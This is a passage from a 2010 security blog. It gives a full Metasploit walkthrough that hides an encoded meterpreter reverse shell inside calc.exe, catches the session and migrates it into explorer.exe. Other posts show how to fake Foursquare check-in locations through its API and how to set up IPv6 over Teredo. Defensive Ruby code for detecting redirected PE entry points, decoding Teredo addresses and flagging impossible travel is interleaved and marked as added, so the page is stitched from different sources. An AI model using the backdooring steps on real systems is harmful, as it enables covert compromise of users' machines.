Very cool update to metasploit today:
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896
This update allows you to msfencode a msfpayload into an existing executable, and the new executable still functions like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
Let's see the new msfencode options:
~/trunk$ ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a
-b
-c
-e
-h Help banner
-i
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m
-n Dump encoder information
-o
-p
-s
-t
-x
Let's make our new backdoored executable.
~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
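A defender-side triage check, added here and not from the post or from Metasploit: a template backdoored this way needs somewhere for the payload to live and the entry point pointed at it, so a PE whose entry point sits outside the first code section, in a writable and executable section, or in the last section of the image deserves a closer look. The parser only reads the PE headers; the section names and the header-only sample images are constructed for the example.

```ruby
# Heuristic check for a PE whose entry point was redirected into injected code.
# Layout offsets are from the PE/COFF spec; section names below are constructed.
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE   = 0x80000000

Section = Struct.new(:name, :virtual_address, :virtual_size, :characteristics)

# Minimal PE parser: e_lfanew, COFF header, AddressOfEntryPoint, section table.
def parse_pe(data)
  raise 'missing MZ header' unless data[0, 2] == 'MZ'
  pe_off = data[0x3c, 4].unpack1('V')
  raise 'missing PE signature' unless data[pe_off, 4] == "PE\0\0"
  nsections = data[pe_off + 6, 2].unpack1('v')
  opt_size  = data[pe_off + 20, 2].unpack1('v')
  entry     = data[pe_off + 24 + 16, 4].unpack1('V')   # AddressOfEntryPoint (RVA)
  sect_off  = pe_off + 24 + opt_size
  sections = Array.new(nsections) do |i|
    name, vsize, vaddr, chars = data[sect_off + i * 40, 40].unpack('Z8VVx20V')
    Section.new(name, vaddr, vsize, chars)
  end
  [entry, sections]
end

# Returns a list of findings; an empty list means the entry point looks ordinary.
def entry_point_findings(data)
  entry, sections = parse_pe(data)
  host = sections.find { |s| entry >= s.virtual_address && entry < s.virtual_address + s.virtual_size }
  return ['entry point lies outside every section'] if host.nil?
  first_code = sections.find { |s| (s.characteristics & IMAGE_SCN_MEM_EXECUTE) != 0 }
  findings = []
  findings << "entry in #{host.name}, not in first executable section #{first_code.name}" if host != first_code
  findings << "entry section #{host.name} is writable and executable" if (host.characteristics & IMAGE_SCN_MEM_WRITE) != 0
  findings << "entry section #{host.name} is the last section of the image" if sections.size > 1 && host == sections.last
  findings
end

# Builds a header-only PE image (no real code) so the check can run offline.
def build_pe(entry, sections)
  dos  = 'MZ'.ljust(0x3c, "\0") + [0x40].pack('V')                  # e_lfanew = 0x40
  coff = "PE\0\0" + [0x14c, sections.size, 0, 0, 0, 0x60, 0x102].pack('vvVVVvv')
  opt  = [0x10b, 0, 0, 0, 0, 0, entry].pack('vCCVVVV').ljust(0x60, "\0")
  table = sections.map { |s| [s.name, s.virtual_size, s.virtual_address, 0, 0, 0, 0, 0, 0, s.characteristics].pack('a8VVVVVVvvV') }.join
  dos + coff + opt + table
end

TEXT     = Section.new('.text', 0x1000, 0x2000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)
DATA     = Section.new('.data', 0x3000, 0x1000, 0x40 | IMAGE_SCN_MEM_WRITE)
INJECTED = Section.new('.inject', 0x4000, 0x800, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE)
CLEAN_PE   = build_pe(0x1010, [TEXT, DATA])             # entry inside .text
SUSPECT_PE = build_pe(0x4010, [TEXT, DATA, INJECTED])   # entry inside the appended section
```

Packers and some linkers also move the entry point, so treat a hit as a reason to look at the binary, not as a verdict.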
Wednesday, March 24, 2010
Msfencode a Msfpayload Into An Existing Executable
Posted by CG at 2:38 PM, 11 comments
Labels: Metasploit
Saturday, March 20, 2010
Working on a new tool
To the readers of this blog,
This blog has been inactive for about a month but it has nothing to do w/ a standstill on my part. I will post something useful relatively soon but please know I am co-authoring another AppSec specific tool and this takes up the majority of my time.
Hopefully when the software (open source) is released it won't disappoint :-)
Cheers,
~cktricky
Posted by cktricky at 2:54 AM, 0 comments
Labels: cktricky
Friday, March 19, 2010
F**king With Foursquare Goes MSF Style
mindless foursquare fun goes metasploit style...
msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info
Name: Foursquare Location Poster
Version: $Revision:$
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
CG
Basic options:
Name      Current Setting     Required  Description
----      ---------------     --------  -----------
PASSWORD  password            yes       foursquare password
Proxies                       no        Use a proxy chain
RHOST     api.foursquare.com  yes       The target address
RPORT     80                  yes       The target port
USERNAME  username            yes       foursquare username
VENUEID   185675              yes       foursquare venueid
VHOST                         no        HTTP server virtual host
Description:
Fuck with Foursquare, be anywhere you want to be by venue id
References:
http://groups.google.com/group/foursquare-api
http://www.mikekey.com/im-a-foursquare-cheater/
msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME notmyusername@host.com
USERNAME => notmyusername@host.com
msf auxiliary(foursquare) > set PASSWORD notmypassword
PASSWORD => notmypassword
msf auxiliary(foursquare) > set VENUEID 9186
VENUEID => 9186
msf auxiliary(foursquare) > run
[*] HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Date: Fri, 19 Mar 2010 13:59:28 GMT
Content-Length: 1311
Server: nginx/0.7.64
Connection: keep-alive
[*] Auxiliary module execution completed
You can get the module here:
http://code.google.com/p/carnal0wnage/source/browse/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb
Posted by CG at 9:56 AM, 1 comments
Labels: auxiliary modules, foursquare, Metasploit
Thursday, March 18, 2010
Getting Started With IPv6
Getting IPv6 up and running
Install the miredo package:
$ sudo apt-get install miredo
After this command, you should see an IPv6 address beginning with "2001:0:" in your network settings (use 'ifconfig'). If so, you're connected to the IPv6 world.
Remove miredo system startup links:
$ sudo update-rc.d -f miredo remove
Usage:
$ sudo /etc/init.d/miredo {start|stop|restart|reload|force-reload}
If miredo is running you should have another interface called "teredo".
You can display it with the following command:
$ ifconfig teredo
To test if you can reach the IPv6 network, try the following:
carnal0wnage ~: ping6 ipv6.google.com
PING ipv6.google.com(iw-in-x63.1e100.net) 56 data bytes
64 bytes from iw-in-x63.1e100.net: icmp_seq=1 ttl=55 time=284 ms
64 bytes from iw-in-x63.1e100.net: icmp_seq=4 ttl=55 time=100 ms
64 bytes from iw-in-x63.1e100.net: icmp_seq=5 ttl=55 time=108 ms
--- ipv6.google.com ping statistics ---
7 packets transmitted, 3 received, 57% packet loss, time 6000ms
rtt min/avg/max/mdev = 100.005/164.009/284.016/84.920 m
carnal0wnage ~: ping6 www.ipv6.org
PING www.ipv6.org(igloo.stacken.kth.se) 56 data bytes
64 bytes from igloo.stacken.kth.se: icmp_seq=1 ttl=58 time=472 ms
64 bytes from igloo.stacken.kth.se: icmp_seq=2 ttl=58 time=156 ms
64 bytes from igloo.stacken.kth.se: icmp_seq=3 ttl=58 time=156 ms
64 bytes from igloo.stacken.kth.se: icmp_seq=5 ttl=58 time=156 ms
64 bytes from igloo.stacken.kth.se: icmp_seq=6 ttl=58 time=156 ms
--- www.ipv6.org ping statistics ---
7 packets transmitted, 5 received, 28% packet loss, time 6000ms
rtt min/avg/max/mdev = 156.009/219.212/472.027/126.408 ms
carnal0wnage ~: traceroute6 www.ipv6.org
traceroute to www.ipv6.org (2001:6b0:1:ea:202:a5ff:fecd:13a6), 30 hops max, 40 byte packets
 1  * * *
 2  terminator.csbnet.se (2a02:9a0:0:1::193)  612.035 ms  612.035 ms  612.035 ms
 3  c2sth-ge-5-0-8.sunet.se (2001:6b0:dead:beef:2::3a9)  648.037 ms  648.037 ms  648.037 ms
 4  a1sth-kth.sunet.se (2001:6b0:dead:beef:2::2c6)  636.036 ms  636.036 ms  636.036 ms
 5  2001:6b0:1:1d20::2 (2001:6b0:1:1d20::2)  736.042 ms  736.042 ms  *
 6  * 2001:6b0:1:1200::3 (2001:6b0:1:1200::3)  324.018 ms  324.018 ms
 7  igloo.stacken.kth.se (2001:6b0:1:ea:202:a5ff:fecd:13a6)  160.009 ms  156.009 ms  156.009 ms
Changing teredo server:
sudo vi /etc/miredo.conf
ServerAddress teredo.ipv6.microsoft.com
sudo /etc/init.d/miredo restart
Windows XP
Install
Open the Terminal with Start -> Run -> cmd
netsh interface ipv6 install
netsh interface ipv6 set teredo client
Uninstall
netsh interface ipv6 uninstall
Vista
Install
IPv6 and Teredo are enabled by default. You can get to the settings through the preferences of a network interface; "Obtain an IPv6 address automatically" should do the trick.
Uninstall
Add this registry value ("DWORD") set to 0xFF (long line, double-click, and copy):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\DisabledComponents
Or save the two lines in a .reg file and double-click it:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents"=dword:000000ff
You can also go to the interface properties of a network interface and deselect the IPv6 protocol for that interface. To enable IPv6 again, replace dword:000000ff above with dword:00000000.
Ref:
http://pugio.net/2007/07/howto-enable-ipv6-the-teredo-w.html
https://blueimp.net/linux/howto/ipv6-teredo.html
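The "2001:0:" prefix the post tells you to look for is the Teredo prefix (2001:0::/32), and the rest of the address encodes the Teredo server, flags, and the client's obfuscated public UDP port and IPv4. The decoder below is an added example, not from the post; it is useful on the defending side because a Teredo address seen on a host or in logs tells you which relay the tunnel uses and which public IPv4 it maps to. The sample address is built from RFC 5737 documentation ranges, not real hosts.

```ruby
require 'ipaddr'
require 'socket'

# Teredo addresses (RFC 4380) live in 2001:0::/32. After the 32-bit prefix come
# the server IPv4 (32 bits), flags (16), UDP port XOR 0xFFFF (16) and client IPv4
# XOR 0xFFFFFFFF (32). The obfuscation is what makes the tail look random.
TEREDO_PREFIX = IPAddr.new('2001:0::/32')

def ipv4_to_i(str)
  IPAddr.new(str).to_i
end

# Build a Teredo address from its parts (used here to construct sample input).
def encode_teredo(server_v4, flags, udp_port, client_v4)
  v  = 0x20010000 << 96
  v |= ipv4_to_i(server_v4) << 64
  v |= (flags & 0xFFFF) << 48
  v |= ((udp_port ^ 0xFFFF) & 0xFFFF) << 32
  v |= ipv4_to_i(client_v4) ^ 0xFFFFFFFF
  IPAddr.new(v, Socket::AF_INET6).to_s
end

# Returns nil for anything that is not a Teredo address, otherwise the decoded fields.
def decode_teredo(addr_str)
  ip = IPAddr.new(addr_str)
  return nil unless ip.ipv6? && TEREDO_PREFIX.include?(ip)
  v = ip.to_i
  {
    server: IPAddr.new((v >> 64) & 0xFFFFFFFF, Socket::AF_INET).to_s,
    cone:   ((v >> 48) & 0x8000) != 0,              # cone flag, bit 0 of the flags field
    port:   ((v >> 32) & 0xFFFF) ^ 0xFFFF,          # client's public UDP port
    client: IPAddr.new((v & 0xFFFFFFFF) ^ 0xFFFFFFFF, Socket::AF_INET).to_s
  }
end

# Constructed sample: server 192.0.2.45, cone flag set, port 40000, client 198.51.100.7.
SAMPLE_TEREDO = encode_teredo('192.0.2.45', 0x8000, 40000, '198.51.100.7')
```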
Posted by CG at 9:13 PM, 0 comments
Labels: IPv6
Monday, March 15, 2010
F**king with Foursquare
Foursquare is pretty neat. You can post your location via phone or browser and get nifty badges for different things, or become the mayor of a place if you check in to that location the most. It's also exceedingly easy to cheat at.
I only casually mentioned the idea of cheating to @Jack_Mannino and within a few minutes of emailing him the link to the API he was already traveling the globe at record speed.
Foursquare even has a nifty and pretty easy to understand API here:
http://groups.google.com/group/foursquare-api/web/api-documentation
The simplest thing you can do is checkin and post your location by vid or venue.
URL: http://api.foursquare.com/v1/checkin
Formats: XML, JSON
HTTP Method(s): POST
Requires Authentication: Yes
Parameters:
- vid - (optional, not necessary if you are 'shouting' or have a venue name). ID of the venue where you want to check-in
- venue - (optional, not necessary if you are 'shouting' or have a vid) if you don't have a venue ID or would rather prefer a 'venueless' checkin, pass the venue name as a string using this parameter. it will become an 'orphan' (no address or venueid but with geolat, geolong)
- shout - (optional) a message about your check-in. the maximum length of this field is 140 characters
- private - (optional). "1" means "don't show your friends". "0" means "show everyone"
- twitter - (optional, defaults to the user's setting). "1" means "send to Twitter". "0" means "don't send to Twitter"
- facebook - (optional, defaults to the user's setting). "1" means "send to Facebook". "0" means "don't send to Facebook"
- geolat - (optional, but recommended)
- geolong - (optional, but recommended)
So a sample request would look like:
POST /v1/checkin?vid= HTTP/1.1
Authorization: Basic
Proxy-Connection: Keep-Alive
Content-Length:
twitter=1&facebook=0
It being a POST, you'll have to write some code to handle the Content-Length, or use Burp Repeater or Metasploit.
Have fun traveling the globe from your living room.
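The weakness on display is that the check-in API takes vid, geolat and geolong from the client as given. A server-side plausibility check is the usual counter, and the check below is an added example (not Foursquare's code, and not from the post): it walks a user's check-ins in time order and flags any that would need faster-than-airliner travel from the previous one, which is exactly the "record speed" pattern described above. The check-in history is constructed for the example.

```ruby
# Server-side plausibility check for client-asserted check-in locations.
EARTH_RADIUS_KM = 6371.0

# Great-circle distance between two lat/long points (haversine formula).
def haversine_km(lat1, lon1, lat2, lon2)
  rad  = ->(deg) { deg * Math::PI / 180.0 }
  dlat = rad.(lat2 - lat1)
  dlon = rad.(lon2 - lon1)
  a = Math.sin(dlat / 2)**2 + Math.cos(rad.(lat1)) * Math.cos(rad.(lat2)) * Math.sin(dlon / 2)**2
  2 * EARTH_RADIUS_KM * Math.asin(Math.sqrt(a))
end

# checkins: array of { venue:, geolat:, geolong:, time: Time }.
# Returns the check-ins that would require travel faster than max_kmh from the previous one,
# each annotated with the implied speed. Two check-ins at different places with no time
# between them count as infinite speed rather than raising a division error.
def impossible_travel(checkins, max_kmh: 1000.0)
  checkins.sort_by { |c| c[:time] }.each_cons(2).map do |prev, cur|
    km    = haversine_km(prev[:geolat], prev[:geolong], cur[:geolat], cur[:geolong])
    hours = (cur[:time] - prev[:time]) / 3600.0
    next nil if km < 0.1                                    # same venue again, nothing to judge
    next cur.merge(speed_kmh: Float::INFINITY) if hours <= 0
    speed = km / hours
    speed > max_kmh ? cur.merge(speed_kmh: speed.round(1)) : nil
  end.compact
end

# Constructed history: NYC -> London in 30 minutes (impossible), then London -> Paris in 90 (fine).
SAMPLE_CHECKINS = [
  { venue: 'NYC',    geolat: 40.7128, geolong: -74.0060, time: Time.utc(2010, 3, 15, 12, 0) },
  { venue: 'London', geolat: 51.5074, geolong: -0.1278,  time: Time.utc(2010, 3, 15, 12, 30) },
  { venue: 'Paris',  geolat: 48.8566, geolong: 2.3522,   time: Time.utc(2010, 3, 15, 14, 0) }
]
```

The 1000 km/h ceiling is an assumption chosen to stay above commercial flight speeds; lower it and legitimate travellers start getting flagged, so tune it to the service.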
Posted by CG at 8:28 PM, 0 comments
Labels: foursquare, ruby